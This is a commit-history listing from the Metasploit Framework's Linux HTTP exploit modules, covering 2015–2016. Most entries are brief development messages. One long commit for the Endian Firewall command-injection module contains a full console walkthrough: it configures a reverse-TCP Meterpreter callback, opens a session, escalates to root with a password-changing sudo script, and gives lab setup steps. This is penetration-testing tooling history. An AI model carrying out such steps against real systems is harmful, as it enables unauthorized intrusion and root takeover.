Commit Graph

1503 Commits (ed2286c637be3030ad94c411592b78ca1c787e3d)

Author SHA1 Message Date
Pedro Ribeiro b48518099c add exploit for CVE 2016-5674 2016-08-04 16:55:21 +01:00
Pedro Ribeiro 0deac80d61 add exploit for CVE 2016-5675 2016-08-04 16:54:38 +01:00
wchen-r7 1e1866f583 Fix #7158, tiki_calendar_exec incorrectly reports successful login
Fix #7158
2016-07-28 17:03:31 -05:00
Vex Woo 864989cf6c For echo command 2016-07-26 20:27:23 -05:00
Brendan 4720d77c3a
Land #6965, centreon useralias exec 2016-07-26 15:02:36 -07:00
James Lee b057a9486c
Don't use ssh agent 2016-07-19 17:07:22 -05:00
James Lee ff63e6e05a
Land #7018, unvendor net-ssh 2016-07-19 17:06:35 -05:00
forzoni 6f35a04e21 Incorporate review fixes, ensure PrependFork is true, fix echo compat. 2016-07-19 01:45:56 -05:00
Brent Cook b08d1ad8d8
Revert "Land #6812, remove broken OSVDB references"
This reverts commit 2b016e0216, reversing
changes made to 7b1d9596c7.
2016-07-15 12:00:31 -05:00
h00die 03dca5fee2 updates round 2 2016-07-15 09:02:23 -04:00
h00die 33ce3ec3ed fixes round 2 2016-07-15 08:44:39 -04:00
David Maloney b6b52952f4
set ssh to non-interactive
have to set the non-interactive flag so that it does not
prompt the user on an incorrect password

MS-1688
2016-07-14 11:12:03 -05:00
David Maloney 01d0d1702b
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-07-14 09:48:28 -05:00
Brent Cook 2b016e0216
Land #6812, remove broken OSVDB references 2016-07-11 22:59:11 -05:00
Brent Cook a530aa4cf1 restrict perms a bit more 2016-07-11 22:22:34 -05:00
Brent Cook a107a0f955 remove unneeded rport/rhost defines 2016-07-11 22:22:34 -05:00
Brent Cook 6bf51fe064 streamline payload generation 2016-07-11 22:22:34 -05:00
Brent Cook 7ef6c8bf9e ruby style updates 2016-07-11 22:22:33 -05:00
Brent Cook c1f51e7ddf Update and fixup module against OpenNMS-16 2016-07-11 22:22:33 -05:00
benpturner 50746eec29 Fixes comments in regards to #{peer} 2016-07-11 22:22:33 -05:00
benpturner ce8317294f New module to exploit the OpenNMS Java Object Unserialization RCE vulnerability. This now gets flagged inside Nessus and there was no Metasploit module to exploit this.
This module exploits the vulnerability to a full session.
2016-07-11 22:22:32 -05:00
William Webb 52c6daa0f2
Land #7048, Riverbed SteelCentral NetProfiler and NetExpress Remote
Command Injection
2016-07-10 18:54:12 -05:00
Francesco b75084249a Removed duplicate 'Privileged' key 2016-07-10 01:37:03 -04:00
sho-luv 25f49c0091 Fixed Description
Just cleaned up Description.
2016-07-08 16:17:39 -07:00
David Maloney 5f9f3259f8
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-07-05 10:48:38 -05:00
Francesco 4ed12d7077 Added: support for credentials saving using report_cred method as suggested
Added: support for detection of valid user credentials to skip login SQLi if not necessary.
2016-07-02 01:41:13 -04:00
William Vu 9663f88fdc Download profile.zip instead of including it
profile.zip is GPL-licensed...
2016-07-01 01:17:23 -05:00
Francesco 068a4007de Riverbed SteelCentral NetProfiler & NetExpress Exploit Module
Changes to be committed:
    new file:   modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
2016-06-29 22:27:40 -04:00
William Vu 68bd4e2375 Fire and forget the shell
Edge case where reverse_perl returns 302 when app is unconfigured.
2016-06-29 14:51:05 -05:00
forzoni d414ea59c3 Remove bash dependency. Oops. 2016-06-28 22:39:45 -05:00
David Maloney 3d93c55174
move sshfactory into a mixin method
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention

MS-1688
2016-06-28 15:23:12 -05:00
David Maloney ee2d1d4fdc
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup 2016-06-28 15:00:35 -05:00
forzoni 5f044ffda0 s/print_warning/print_error. 2016-06-28 10:26:23 -05:00
forzoni 0635fee820 Move some log lines to vprint_status. 2016-06-28 03:28:41 -05:00
forzoni 6c11692b04 Add privilege escalation for host users that can access the docker daemon. 2016-06-28 03:24:41 -05:00
William Vu 5f08591fef Add Nagios XI exploit 2016-06-27 15:17:18 -05:00
h00die 1c20122648 fedora compatibility, added naming options 2016-06-25 08:43:55 -04:00
David Maloney 6c3871bd0c
update ssh modules to use new SSHFactory
updated all of our SSh based module to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH

MS-1688
2016-06-24 13:55:28 -05:00
h00die 18a3bf5f62 service persistence 2016-06-22 19:22:18 -04:00
wchen-r7 de5152401a
Land #6992, Add tiki calendar exec exploit 2016-06-22 11:18:14 -05:00
wchen-r7 8697d3d6fb Update tiki_calendar_exec module and documentation 2016-06-22 11:17:45 -05:00
h00die 0f2c1d886c append over read and write 2016-06-21 16:56:34 -04:00
h00die 9cb57d78d7 updated check and docs that 14.2 may not be vuln 2016-06-21 16:48:09 -04:00
h00die c7bacebd5b slight issues found by void-in 2016-06-21 05:12:10 -04:00
h00die 4b8f572976 cron persistence 2016-06-20 21:45:04 -04:00
h00die 15a3d739c0 fix per wchen 2016-06-20 17:57:10 -04:00
h00die 6fe7698b13 follow redirect automatically 2016-06-19 20:24:54 -04:00
h00die 3f25c27e34 2 void-in fixes of 3 2016-06-19 14:35:27 -04:00
h00die ddfd015310 functionalized calendar call, updated docs 2016-06-19 08:53:22 -04:00
h00die 3feff7533b tiki calendar 2016-06-18 13:11:11 -04:00
h00die ebde552982 gem version 2016-06-16 21:09:56 -04:00
Brendan Watters 9ea0b8f944
Land #6934, Adds exploit for op5 configuration command execution 2016-06-16 14:36:10 -05:00
William Vu ea988eaa72 Add setsid to persist the shell
Prevents the watchdog from killing our session.
2016-06-16 11:31:35 -05:00
h00die cfb034fa95 fixes all previously identified issues 2016-06-15 20:58:04 -04:00
h00die 81fa068ef0 pulling out the get params 2016-06-15 12:27:31 -04:00
h00die 52db99bfae vars_post for post request 2016-06-15 07:24:41 -04:00
h00die 625d60b52a fix the other normalize_uri 2016-06-14 15:03:07 -04:00
h00die afc942c680 fix travis 2016-06-13 19:07:14 -04:00
h00die bd4dacdbc3 added Rank 2016-06-13 19:04:06 -04:00
h00die 72ed478b59 added exploit rank 2016-06-13 18:56:33 -04:00
h00die 40f7fd46f9 changes outlined by wvu-r7 2016-06-13 18:52:25 -04:00
h00die f63273b172 email change 2016-06-11 21:05:34 -04:00
h00die bd6eecf7b0 centreon useralias first add 2016-06-11 20:57:18 -04:00
William Vu ec1248d7af Convert to CmdStager 2016-06-10 20:42:01 -05:00
William Vu 46239d5b0d Add Apache Continuum exploit 2016-06-09 22:35:38 -05:00
h00die d63dc5845e wvu-r7 comment fixes 2016-06-09 21:52:21 -04:00
William Vu 6da8c22171 Rename hash method to crypt
To avoid a conflict with Object#hash in Pro.

MS-1636
2016-06-09 15:21:40 -05:00
h00die 6f5edb08fe pull uri from datastore consistently 2016-06-08 20:28:36 -04:00
Brendan Watters c4aa99fdac
Land #6925, ipfire proxy exec 2016-06-07 10:24:59 -05:00
Brendan Watters 7e84c808b2 Merge remote-tracking branch 'upstream/pr/6924' into dev 2016-06-07 09:24:25 -05:00
h00die c2699ef194 rubocop fixes 2016-06-03 17:43:11 -04:00
h00die 2f837d5d60 fixed EDB spelling 2016-06-03 17:17:36 -04:00
h00die 8d76bdb8af fixed EDB reference 2016-06-03 17:13:36 -04:00
Brendan Watters d7cd10f586 Suggested updates for style and clarity 2016-06-03 14:04:58 -05:00
Brendan Watters 91658d2a61 Changes per rubocop and sinn3r 2016-06-03 12:42:38 -05:00
h00die 68d647edf1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into op5 2016-06-01 18:05:18 -04:00
h00die 52d5028548 op5 config exec 2016-06-01 15:07:31 -04:00
h00die 8ce59ae330 travis fixes 2016-05-31 05:46:20 -04:00
h00die 057947d7e8 ipfire proxy exec 2016-05-30 10:24:17 -04:00
h00die 9b5e3010ef doc/module cleanup 2016-05-30 06:33:48 -04:00
h00die df55f9a57c first add of ipfire shellshock 2016-05-29 20:40:12 -04:00
wchen-r7 14adcce8bf Missed the HTTPUSERNAME fix 2016-05-27 18:37:04 -05:00
wchen-r7 61f9cc360b Correct casing - should be HttpUsername and HttpPassword 2016-05-27 18:31:54 -05:00
wchen-r7 4dcddb2399 Fix #4885, Support basic and form auth at the same time
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.

Fix #4885
2016-05-27 16:25:42 -05:00
William Vu 6581fbd294 Add note about "mf" malware
This is the malware I found upon shelling my friend's device.
2016-05-20 23:09:10 -05:00
William Vu a16f4b5167 Return nil properly in rescue
Missed this because I copypasta'd myself.
2016-05-19 15:35:38 -05:00
William Vu d018bba301 Store SSH key as a note
I know, I know, it should use the creds model. >:[
2016-05-19 15:12:58 -05:00
William Vu 9f738c3e41 Add note about overwritten files 2016-05-19 15:07:27 -05:00
William Vu 8fccb26446 Add Ubiquiti airOS exploit
Thanks to my friend wolf359 for providing a test device!
2016-05-19 14:50:20 -05:00
Vex Woo 4a4904149b ruby conditional operator -> expression 2016-05-16 10:45:04 -05:00
Vex Woo 4a3ab9d464 add a module for netcore/netdis udp 53413 backdoor 2016-05-16 02:11:53 -05:00
Nicholas Starke 4b23d2dc58 Adjusting exception handling
This commit adjusts the error handling to close the socket before
calling fail_with and adds specific exceptions to catch
2016-05-11 17:18:51 -05:00
Nicholas Starke 32ae3e881e Adding save_cred and exception handling to module
This commit adds a save_cred method for saving off the credentials
upon a successful login attempt.  Also, exception handling surrounding
the opening of the telnet socket has been added to avoid any accidental
resource leaking.
2016-05-10 20:54:44 -05:00
Nicholas Starke 8eb3193941 Adding TP-Link sc2020n Module
This module exploits a command injection vulnerability in
TP-Link sc2020n network video cameras in order to start the
telnet daemon on a random port.  The module then connects to
the telnet daemon, which returns a root shell on the device.
2016-05-08 14:02:50 -05:00
wchen-r7 df44dc9c1c Deprecate exploits/linux/http/struts_dmi_exec
Please use exploits/multi/http/struts_dmi_exec, which supports
Windows and Java targets.
2016-05-02 15:03:25 -05:00
join-us 6a00f2fc5a mv exploits/linux/http/struts_dmi_exec.rb to exploits/multi/http/struts_dmi_exec.rb 2016-05-01 00:00:29 +08:00
join-us ec66410fab add java_stager / windows_stager | exploit with only one http request 2016-04-30 23:56:56 +08:00
wchen-r7 d6a6577c5c Default payload to linux/x86/meterpreter/reverse_tcp_uuid
Default to linux/x86/meterpreter/reverse_tcp_uuid for now because
of issue #6833
2016-04-29 11:52:50 -05:00
wchen-r7 97061c1b90 Update struts_dmi_exec.rb 2016-04-29 11:13:25 -05:00
wchen-r7 e9535dbc5b Address all @FireFart's feedback 2016-04-29 11:03:15 -05:00
wchen-r7 6f6558923b Rename module as struts_dmi_exec.rb 2016-04-29 10:34:48 -05:00
wchen-r7 4a95e675ae Rm empty references 2016-04-24 11:46:08 -05:00
wchen-r7 816bc91e45 Resolve #6807, remove all OSVDB references.
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.

Resolve #6807
2016-04-23 12:32:34 -05:00
wchen-r7 92ef8f4ab3
Land #6751, Correct proftp version check at module runtime 2016-04-14 15:34:53 -05:00
wchen-r7 c4aac2a54a Remove unwanted comments 2016-04-07 11:22:57 -05:00
James Lee 7658014fb7
Add CVEs 2016-04-07 08:39:29 -05:00
James Lee 87d59a9bfb
Add exploit for ExaGrid known credentials 2016-04-07 04:17:43 -05:00
greg.mikeska@rapid7.com 08736c798d
Correct proftp version check at module runtime 2016-04-05 13:06:10 -05:00
wchen-r7 102d28bda4 Update atutor_filemanager_traversal 2016-03-22 14:44:07 -05:00
wchen-r7 9cb43f2153 Update atutor_filemanager_traversal 2016-03-22 14:42:36 -05:00
Steven Seeley 3842009ffe Add ATutor 2.2.1 Directory Traversal Exploit Module 2016-03-22 12:17:32 -05:00
James Lee 1375600780
Land #6644, datastore validation on assignment 2016-03-17 11:16:12 -05:00
Adam Cammack 05f585157d
Land #6646, add SSL SNI and unify SSLVersion opts 2016-03-15 16:35:22 -05:00
Christian Mehlmauer 3123175ac7
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00
Brent Cook f703fa21d6 Revert "change Metasploit3 class names"
This reverts commit 666ae14259.
2016-03-07 13:19:55 -06:00
Brent Cook 44990e9721 Revert "change Metasploit4 class names"
This reverts commit 3da9535e22.
2016-03-07 13:19:48 -06:00
Christian Mehlmauer 3da9535e22
change Metasploit4 class names 2016-03-07 09:57:22 +01:00
Christian Mehlmauer 666ae14259
change Metasploit3 class names 2016-03-07 09:56:58 +01:00
Brent Cook eea8fa86dc unify the SSLVersion fields between modules and mixins
Also actually handle the 'Auto' option that we had in the crawler and remove
hardcoded defaults in modules that do not need them.
2016-03-06 22:06:27 -06:00
Brent Cook c7c0e12bb3 remove various module hacks for the datastore defaults not preserving types 2016-03-05 23:11:39 -06:00
Brent Cook bc7bf28872
Land #6591, don't require username for wrt110 cmd exec module 2016-02-18 20:20:15 -06:00
joev 3b9502cb1d Don't require username in wrt110 module. 2016-02-18 18:45:04 -06:00
Brent Cook 3d1861b3f4 Land #6526, integrate {peer} string into logging by default 2016-02-15 15:19:26 -06:00
William Vu 5b3fb99231
Land #6549, module option for X-Jenkins-CLI-Port 2016-02-10 10:34:33 -06:00
William Vu c67360f436 Remove extraneous whitespace 2016-02-10 09:44:01 -06:00
wchen-r7 1d6b782cc8 Change logic
I just can't deal with this "unless" syntax...
2016-02-08 18:40:48 -06:00
wchen-r7 d60dcf72f9 Resolve #6546, support manual config for X-Jenkins-CLI-Port
Resolve #6546
2016-02-08 18:16:48 -06:00
James Lee 12256a6423
Remove now-redundant peer
These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient
2016-02-01 15:12:03 -06:00
Nicholas Starke d51be6e3da Fixing typo
This commit fixes a typo in the word "service"
2016-01-28 16:44:42 -06:00
Nicholas Starke 1ef7aef996 Fixing User : Pass delimiter
As per the PR comments, this commit replaces the user and
pass delimiter from "/" to ":"
2016-01-27 17:20:58 -06:00
Nicholas Starke 4560d553b5 Fixing more issues from comments
This commit includes more minor fixes from the github
comments for this PR.
2016-01-24 19:43:02 -06:00
Nicholas Starke d877522ea5 Fixing various issues from comments
This commit fixes issues with specifying "rhost:rport",
replacing them instead with "peer".  Also, a couple of
"Unknown" errors were replaced with "UnexpectedReply".
2016-01-23 13:43:09 -06:00
Nicholas Starke a5a2e7c06b Fixing Disclosure Date
Disclosure date was in incorrect format, this commit
fixes the issue
2016-01-23 11:41:05 -06:00
Nicholas Starke 8c8cdd9912 Adding Dlink DCS Authenticated RCE Module
This module takes advantage of an authenticated HTTP RCE
vulnerability to start telnet on a random port. The module
then connects to that telnet session and returns a shell.
This vulnerability is present in version 2.01 of the firmware
and resolved by version 2.12.
2016-01-23 11:15:23 -06:00
wchen-r7 7259d2a65c Use unless instead of if ! 2016-01-05 13:05:01 -06:00
Brendan Coles 7907c93047 Add D-Link DCS-931L File Upload module 2016-01-05 04:15:38 +00:00
Jon Hart 27a6aa0be1
Fix current msftidy warnings about PACKETSTORM vs URL 2015-12-24 09:05:02 -08:00
Jon Hart efdb6a8885
Land #6392, @wchen-r7's 'def peer' cleanup, fixing #6362 2015-12-24 08:53:32 -08:00
Brent Cook e4f9594646
Land #6331, ensure generic payloads raise correct exceptions on failure 2015-12-23 15:43:12 -06:00
wchen-r7 cea3bc27b9 Fix #6362, avoid overriding def peer repeatedly
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also clears a few
modules that use the HttpClient mixin with def peer.
2015-12-23 11:44:55 -06:00
wchen-r7 ab3fe64b6e Add method peer for jenkins_java_deserialize.rb 2015-12-15 01:18:27 -06:00
wchen-r7 bd8aea2618 Fix check for jenkins_java_deserialize.rb
This fixes the following:

* nil return value checks
* handle missing X-Jenkins-CLI-Port scenario more properly
* proper HTTP path normalization
2015-12-14 11:25:59 -06:00
dmohanty-r7 eb4611642d Add Jenkins CLI Java serialization exploit module
CVE-2015-8103
2015-12-11 14:57:10 -06:00
karllll a5c6e260f2 Update hp_vsa_login_bof.rb
Updated reference URL to latest location
2015-12-10 10:56:39 -05:00
wchen-r7 11c1eb6c78 Raise Msf::NoCompatiblePayloadError if generate_payload_exe fails
Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
2015-12-08 21:13:23 -06:00
James Lee 385378f338 Add reference to Rapid7 advisory 2015-12-01 11:37:27 -06:00
HD Moore 9dbf7cb86c Remove the SSL option (not needed) 2015-12-01 11:34:03 -06:00
HD Moore 758e7c7b58 Rename 2015-12-01 11:33:45 -06:00
HD Moore ea2174fc95 Typo and switch from raw -> encoded 2015-12-01 10:59:12 -06:00
HD Moore 16d0d53150 Update Shellshock modules, add Advantech coverage 2015-12-01 10:40:46 -06:00
Jon Hart 8d1f5849e0
Land #6228, @m0t's module for F5 CVE-2015-3628 2015-11-18 15:39:40 -08:00
Jon Hart ae3d65f649
Better handling of handler creation output 2015-11-18 15:31:32 -08:00
Jon Hart bcdf2ce1e3
Better handling of invulnerable case; fix 401 case 2015-11-18 15:24:41 -08:00
Jon Hart deec836828
scripts/handlers cannot start with numbers 2015-11-18 12:31:46 -08:00
Jon Hart 7399b57e66
Elminate multiple sessions, better sleep handling for session waiting 2015-11-18 12:23:28 -08:00
Jon Hart e4bf5c66fc
Use slightly larger random script/handler names to avoid conflicts 2015-11-18 11:51:44 -08:00
Jon Hart e7307d1592
Make cleanup failure messages more clear 2015-11-18 11:44:34 -08:00
Jon Hart 0e3508df30 Squash minor rubocop gripes 2015-11-18 11:05:10 -08:00
Jon Hart f8218f0536 Minor updates to print_ output; wire in handler_exists; 2015-11-18 11:05:10 -08:00
Jon Hart 392803daed Tighten up cleanup code 2015-11-18 11:05:10 -08:00
m0t c0d9c65ce7 always overwrite the payload file 2015-11-18 18:48:34 +00:00
Jon Hart e21bf80ae4
Squash a rogue space 2015-11-17 14:17:59 -08:00
Jon Hart 3396fb144f
A little more simplification/cleanup 2015-11-17 14:16:29 -08:00
Jon Hart dcfb3b5fbc
Let Filedropper handle removal 2015-11-17 13:01:06 -08:00
Jon Hart 715f20c92c
Add missing super in setup 2015-11-16 14:45:13 -08:00
Jon Hart 902951c0ca
Clean up description; Simplify SOAP code more 2015-11-16 11:06:45 -08:00
Jon Hart 1aa1d7b5e4
Use random path for payload 2015-11-16 10:57:48 -08:00
Jon Hart ee5d91faab
Better logging when exploit gets 401 2015-11-16 10:41:48 -08:00
Jon Hart c4ffd7ae36
When sending SOAP requests, print out proto/status/message when fail 2015-11-16 10:38:40 -08:00
Jon Hart e58e17450a
Simplify XML building 2015-11-13 11:36:56 -08:00
Jon Hart ecbd453301
Second pass at style cleanup. Conforms now 2015-11-13 11:24:11 -08:00
Jon Hart 85e5b0abe9
Initial style cleanup 2015-11-13 10:42:26 -08:00
m0t eae2d6c89d F5 module 2015-11-12 09:51:09 +00:00
HD Moore f86f427d54 Move Compat into Payload so that is actually used 2015-11-09 16:06:05 -06:00
m0t 66ed66cc81 Merge pull request #1 from m0t/changes
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-09 16:11:29 +00:00
m0t daa999fb1c f5 module 2015-11-09 16:02:32 +00:00
m0t d4d4e3ddb0 f5 module 2015-11-09 13:41:59 +00:00
m0t 893c4cd52d f5 module 2015-11-09 13:10:54 +00:00
wchen-r7 154fb585f4 Remove bad references (dead links)
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
HD Moore d67b55d195 Fix autofilter values for aggressive modules 2015-10-13 15:56:18 -07:00
Tod Beardsley 185e947ce5
Spell 'D-Link' correctly 2015-10-12 17:12:01 -05:00
Tod Beardsley 336c56bb8d
Note the CAPTCHA exploit is good on 1.12. 2015-10-12 17:09:45 -05:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
HD Moore cd65478d29
Land #5826, swap ExitFunction -> EXITFUNC 2015-09-01 13:58:12 -05:00
Christian Mehlmauer 3e613dc333
change exitfunc to thread 2015-09-01 10:43:45 +02:00
Christian Mehlmauer 648c034d17
change exitfunc to thread 2015-09-01 10:42:15 +02:00
Christian Mehlmauer 80a22412d9 use EXITFUNC instead of ExitFunction 2015-08-13 21:22:32 +02:00
jvazquez-r7 203c231b74
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00
wchen-r7 768de00214 Automatically pass arch & platform from cmdstager
This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:

Fix #5727
Fix #5718
Fix #5761
2015-07-27 14:17:21 -05:00
wchen-r7 6720a57659 Fix #5761, pass the correct arch and platform for exe generation
Fix #5761
2015-07-23 01:34:44 -05:00
Christian Mehlmauer b31c637c1b
Land #5533, DSP-W110 cookie command injection 2015-07-15 11:22:33 +02:00
Christian Mehlmauer 21375edcb2
final cleanup 2015-07-15 11:21:39 +02:00
Michael Messner d7beb1a685 feedback included 2015-07-09 08:31:11 +02:00
HD Moore 25e0f888dd Initial commit of R7-2015-08 coverage 2015-07-08 13:42:11 -05:00
Michael Messner 5b6ceff339 mime message 2015-07-06 15:00:12 +02:00
Ben Lincoln 6e9a477367 Removed reference URL for the report to the vendor, as it is no
longer valid.
2015-07-03 13:48:24 -07:00
Ben Lincoln 02ace9218b Added handling for HTTP 401 (Authorization Required) response from target.
Added Exploit DB entries to references list.

Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
Ben Lincoln db721dff8e Cleaned up double-negative logic.
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
Ben Lincoln 6ceb734972 Replaced standard option TIMEOUT with advanced option
HTTPClientTimeout per void-in's request.

Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
Ben Lincoln 3d32438b34 Added missing closing paren in description text. 2015-06-30 12:43:31 -07:00
Ben Lincoln e929dec829 Re-formatted and tweaked the module description. 2015-06-30 12:42:17 -07:00
Ben Lincoln ce61bcd3b4 Removed a trailing space from line 40. 2015-06-29 22:48:16 -07:00
aos 13dc181f1c Exploit Module: Endian Firewall Proxy Password Change Command Injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
	  distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
	- Be sure to pick a valid IP for the "Green" network interface, as
	  you will use it to access a web GUI to complete the configuration
	- If prompted to create a root/SSH password and/or web admin
	  password, make a note of them. Well, make a note of the web admin
	  password - the exploit module will let you change the root
	  password later if you want to. This step is dependent on the
	  version selected - some will prompt, others default the values to
	  "endian".
	- Once the OS-level configuration is complete, access the web
	  interface to complete the setup. If you used 172.16.47.1 for the
	  "Green" interface, then the URL will be
	  https://172.16.47.1:10443/
	- If the web interface is not accessible, reboot the VM (in some
	  versions, the web interface does not come up until after the
	  first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
	  the username/password is admin/endian.
	- Use the second NIC for the "Red" interface. It will not actually
	  be used during this walkthrough, so feel free to specify a bogus
	  address on a different/nonexistent subnet. Same for its default
	  gateway.
	- Once the base configuration is complete, access the main web
	  interface URL again.
	- Switch to the Proxy tab.
	- Enable the HTTP proxy.
	- Click Save (or Apply, depending on version).
	- If prompted to apply the settings, do so.
	- Click on the Authentication sub-tab.
	- Make sure the Authentication Method is Local (this should be the
	  default).
	- Click the _manage users_ (Or _User management_, etc., depending
	  on version) button.
	- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
	- Enter "proxyuser" for the username, and "password123" for the
	  password, or modify the directions below this point accordingly.
	- Click the _Create user_ button.
	- If prompted to apply the settings, do so.

Module test	process:
  From within the MSF console, execute these commands:

    use exploit/linux/http/efw_chpasswd_exec
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST [YOUR_HOST_IP]
    set LPORT 443
    set RHOST [ENDIAN_GREEN_IP]
    set EFW_USERNAME proxyuser
    set EFW_PASSWORD password123
    exploit

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
	uname -a
	sudo -l
	sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).
2015-06-29 12:03:17 -07:00
Michael Messner c8dddbff70 server header 2015-06-24 21:32:01 +02:00
Michael Messner 8bc012a665 echo stager via upload vulnerability 2015-06-23 23:09:08 +02:00
Michael Messner d8e11789ea cmd_interact - first try 2015-06-20 07:59:25 +02:00
jvazquez-r7 c2f0973ed0
Report attempt_time 2015-06-19 10:31:50 -05:00
wchen-r7 fb9ad663f7 Change to Metasploit::Model::Login::Status::SUCCESSFUL 2015-06-18 23:42:16 -05:00
Michael Messner 145637470a port, email, cleanup 2015-06-14 08:27:23 +02:00
Michael Messner 1b040f3374 dsp-w110-command-injection 2015-06-13 21:45:56 +02:00
wchen-r7 744baf2d44 Update kloxo_sqli to use the new cred API 2015-06-03 23:28:35 -05:00
m-1-k-3 c8123c147f upnp vs hnap 2015-05-05 20:57:05 +02:00
Christian Mehlmauer 73f7885eea
add comment 2015-05-29 23:08:55 +02:00
jvazquez-r7 1be04a9e7e
Land #5182, @m-1-k-3's exploit for Dlink UPnP SOAP-Header Injection 2015-05-29 14:49:09 -05:00
jvazquez-r7 8b2e49eabc
Do code cleanup 2015-05-29 14:45:47 -05:00
jvazquez-r7 9ccf04a63b
Land #5420, @m-1-k-3's miniigd command injection module (ZDI-15-155) 2015-05-29 13:29:03 -05:00
jvazquez-r7 9ebd6e5d6e
Use REXML 2015-05-29 13:27:19 -05:00
jvazquez-r7 294fa78c1f
Land #5430, @m-1-k-3's adding specific endianess Arch to some exploits 2015-05-29 11:43:25 -05:00
jvazquez-r7 dd39d196f5
